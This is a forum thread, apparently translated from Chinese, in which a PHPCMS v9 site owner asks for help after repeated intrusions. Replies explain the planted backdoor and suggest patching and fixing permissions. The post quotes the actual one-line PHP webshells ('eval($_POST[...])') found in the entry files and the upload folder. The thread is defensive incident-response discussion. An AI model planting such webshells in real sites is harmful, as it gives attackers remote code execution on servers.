The website program has been invaded by Trojan [<?php eval($_POST[1]);?> ok]. Please help to find out the mechanism?
伊谢尔伦
伊谢尔伦 2017-06-26 10:48:58
0
5
2498

The website has been frequently attacked by hackers recently, and we are asking for help from PHP experts to clarify our thinking, so that we can find loopholes as soon as possible and solve our worries!

The incident is now described as follows:

1. The website is built using the default version of PHPCMS_V9_5.20.

2. All files are initially stored in the server root directory with fully open permissions.

3. Later, the website was hacked and the entry files api.php and index.php were rewritten.

4. The virus file implanted is: "One Sentence Trojan". The content is as follows:

<?php @eval($_POST['dcs-19']);?>
<?php

5. Found the problem , after deleting it, lock the permissions of such files, thinking that this will solve the problem. However, a few days later, I found that the snapshot of the website had been hijacked, so I checked and killed the Trojan again. The results showed that the location of the Trojan file was in the uploadfile20170527 folder in the root directory of the server. This file is automatically created based on the date when uploading attachments or updating articles in the background. generate. However, the article was not updated on May 27, but it appeared, asking for help from experts to investigate the root cause of the website problem.

The content of the Trojan is:

<?php eval($_POST[1]);?>
ok

Attached: After searching the relevant content on the Internet, most of them said it was a sql injection attack caused by website program vulnerabilities, and it was prompted to fix the vulnerability, but how to fix it? Is it useful to upgrade the PHP version online?

[I’m a novice from a technical background, so I don’t understand many things. If you don’t understand something, I’ll follow your instructions and add it during the Q&A!

伊谢尔伦
伊谢尔伦

小伙看你根骨奇佳,潜力无限,来学PHP伐。

reply all(5)
学霸

The code principle of this sentence is very simple. POST refers to the data sent by the client, and eval means to execute the data as code.
For hackers, you only need to enter the code in the dialog box on your web page, and it will be actually executed after submission.

This is just a symptom, that is, the last backdoor left. But how did the hacker come in and leave the backdoor? There are too many possibilities. Maybe there is a vulnerability in the upload function, the ftp password is broken, the administrator privileges are obtained, etc. This Trojan is left in the end just for convenience next time.

The minimum thing you need to do is to download the entire set of codes, go through all the codes, and find all eval-related places. If they are not necessary for the program, deal with them all. Otherwise, if you delete one here, they will re-do it elsewhere. Upload one, it’s endless. The second is to plug system management loopholes. Update server components if they can be updated. Change all passwords and use random strong passwords. Then install anti-virus software on the server. I remember that I used an open source Linux server before. . If you forget the name, just search it.

Finally, if it doesn’t work, leave it to a professional to see if the investment is worth it. I remember that there are foreign websites that provide Trojan killing and change monitoring services. It seems to cost one or two hundred dollars a year, which is quite expensive. I don’t know if there is the same service in China.

阿神

Notice about PHPCMS vulnerability
Dear users:
Hello!
The latest vulnerability exposed in the PHPCMS program in April this year can inject PHP Trojan files into the website by modifying the member registration parameters. Through our company's testing, we found that when registering as a member, PHPCMS will encrypt the registration information and then pass it to the server for member registration. Since the encryption method cannot be cracked temporarily, our company cannot intercept hacker intrusions by matching the corresponding keywords. ;
There are currently three solutions:

  1. Upgrade to the latest PHPCMS program;

  2. Close the member registration function on the website;

  3. Cancel the execution permission of the uploadfile directory (this method can avoid Trojan execution, but cannot avoid Trojan file upload);
    After executing any of the above solutions, please thoroughly check the uploadfile directory and subdirectories to see if they contain PHP files. This directory is for uploading The picture saving directory of the picture. If a PHP file is found, it must be a Trojan file! Please delete it promptly!

Jingan Network
2017.6.19

给我你的怀抱

Change the server password, change the SSH default port, and change the server to another server. Changed to PHPCMS, which stopped updating 5 or 6 years ago. There are definitely a lot of loopholes.

typecho

Permission issue, your upload directory has executable permissions.
The solution to the problem is to eliminate the vulnerabilities of PHPCMS. You need to remove the executable permissions of the directories of all external files (codes that are not written by yourself or the framework).

chmod -R 644 upload
滿天的星座

Replies from the two people above: Your upload directory has executable permissions enabled, Cancel the execution permissions of the uploadfile directory
What does this mean? The directory execution permission has been cancelled, the directory cannot be opened, and even if I want to upload pictures, I cannot upload them. Is that still okay?

Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template